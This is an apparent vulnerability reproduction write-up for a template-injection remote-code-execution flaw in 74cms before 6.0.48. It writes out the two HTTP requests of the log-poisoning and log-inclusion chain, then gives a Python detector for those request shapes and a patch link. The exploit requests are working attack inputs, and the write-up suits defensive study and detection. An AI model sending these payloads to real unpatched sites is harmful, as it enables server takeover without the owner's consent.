Introduction
74cms (骑士CMS) is a free, open-source recruitment website system built on PHP and MySQL.
Vulnerability overview
Advisory:
http://www.74cms.com/news/show-2497.html
The assign_resume_tpl function in /Application/Common/Controller/BaseController.class.php does not filter its input strictly enough, resulting in template injection that can be leveraged for remote command execution.
Affected versions
74cms (骑士CMS) < 6.0.48
Environment setup
phpStudy is used to set up the environment here.
Download:
http://www.74cms.com/download/index.html
I installed it with PHP 5.5.9.
Installation complete.
Reproduction
Send the following request:
http://your-ip/index.php?m=home&a=assign_resume_tpl
POST:
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
POST /upload/index.php?m=home&a=assign_resume_tpl HTTP/1.1
Host: 192.168.1.102
Content-Length: 102
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.23.128
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.23.128/74cms_v6.0.20/upload/index.php?m=home&a=assign_resume_tpl
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,vi;q=0.8,id;q=0.7
Cookie: PHPSESSID=ktl5a9hhct39p0vsnh7pjc2nhn; think_language=zh-CN; think_template=default
Connection: close
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show h
="info" id="$_GET['id']"/>
The error has now been recorded in the log directory:
\upload\data\Runtime\Logs\Home
Next, include the log file:
http://your-ip/index.php?m=home&a=assign_resume_tpl
POST:
variable=1&tpl=data/Runtime/Logs/Home/20_12_22.log
The log file is named after the current date (year_month_day, e.g. 20_12_22.log for 2020-12-22).
POST /upload/index.php?m=home&a=assign_resume_tpl HTTP/1.1
Host: 192.168.1.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: http://192.168.1.102
Connection: close
Referer: http://192.168.1.102/upload/index.php?m=home&a=assign_resume_tpl
Cookie: PHPSESSID=aitev5o1kse9c0tqlisua983s3; think_language=zh-CN; think_template=default
Upgrade-Insecure-Requests: 1
variable=1&tpl=data%2FRuntime%2FLogs%2FHome%2F20_12_22.log
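The two requests above show the shape a defender needs to recognise: a POST to m=home&a=assign_resume_tpl whose tpl parameter carries either PHP/qscms template markup (the log-poisoning step) or a path into data/Runtime/Logs (the inclusion step). The following Python is an added example, not 74cms code; it assumes requests are available as (method, path, body) records from a reverse proxy or WAF that logs POST bodies (the web server access log alone does not contain the body), and the indicator patterns, the allowlist check and the sample records are all constructed here for illustration.

```python
"""Request-level indicators for the assign_resume_tpl template-injection pattern.

Added example (not 74cms code). Assumes (method, path, body) records are
available, e.g. from a proxy or WAF that logs POST bodies.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Indicator patterns (assumptions, not the vendor's own filter): PHP open
# tag, qscms template tags, path separators/traversal, runtime log paths.
PHP_TAG = re.compile(r"<\?")
TEMPLATE_TAG = re.compile(r"<\s*/?\s*qscms\b", re.IGNORECASE)
PATH_CHARS = re.compile(r"(\.\.|[/\\])")
RUNTIME_LOG = re.compile(r"runtime[/\\]logs", re.IGNORECASE)
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def parse_form_body(body):
    """Decode an application/x-www-form-urlencoded body into a dict.
    Splits on '&' only, so ';' inside a value (e.g. 'phpinfo();') survives."""
    fields = {}
    for part in body.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def classify_tpl(tpl):
    """Return the list of indicators found in a tpl value (empty = clean)."""
    reasons = []
    if PHP_TAG.search(tpl):
        reasons.append("php_open_tag")
    if TEMPLATE_TAG.search(tpl):
        reasons.append("qscms_template_tag")
    if PATH_CHARS.search(tpl):
        reasons.append("path_traversal_or_separator")
    if RUNTIME_LOG.search(tpl) or tpl.lower().endswith(".log"):
        reasons.append("runtime_log_reference")
    return reasons


def is_safe_template_name(tpl, allowed):
    """Hardened handling (hypothetical): accept only a bare identifier that
    names a known template, never a path or markup."""
    return bool(SAFE_NAME.match(tpl)) and tpl in allowed


def targets_assign_resume_tpl(path):
    """True when the query string routes to the vulnerable action."""
    query = parse_form_body(urlsplit(path).query)
    return query.get("m", "").lower() == "home" and query.get("a") == "assign_resume_tpl"


def scan_requests(records):
    """Return (index, reasons) for POSTs to the action with a suspicious tpl."""
    hits = []
    for i, (method, path, body) in enumerate(records):
        if method.upper() != "POST" or not targets_assign_resume_tpl(path):
            continue
        reasons = classify_tpl(parse_form_body(body).get("tpl", ""))
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample records: the two request shapes from the write-up
# (markup in tpl, then inclusion of the day's runtime log), a benign
# request, and an unrelated GET. Hosts and dates are placeholders.
SAMPLE_REQUESTS = [
    ("POST", "/index.php?m=home&a=assign_resume_tpl",
     "variable=1&tpl=%3C%3Fphp+phpinfo%28%29%3B+ob_flush%28%29%3B%3F%3E%0D%0A%3Cqscms%2Fcompany_show+%2F%3E"),
    ("POST", "/index.php?m=home&a=assign_resume_tpl",
     "variable=1&tpl=data%2FRuntime%2FLogs%2FHome%2F20_12_22.log"),
    ("POST", "/index.php?m=home&a=assign_resume_tpl",
     "variable=1&tpl=resume_default"),
    ("GET", "/index.php?m=home&a=index", ""),
]

if __name__ == "__main__":
    for idx, reasons in scan_requests(SAMPLE_REQUESTS):
        print(idx, reasons)
```

The classifier is deliberately broad (any path separator in tpl is flagged) because the parameter should only ever name a template; the is_safe_template_name check expresses the same idea as an allowlist, which is the behaviour a patched handler should enforce rather than a blocklist of bad characters.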
Remediation
Download the latest patch package:
http://www.74cms.com/download/index.html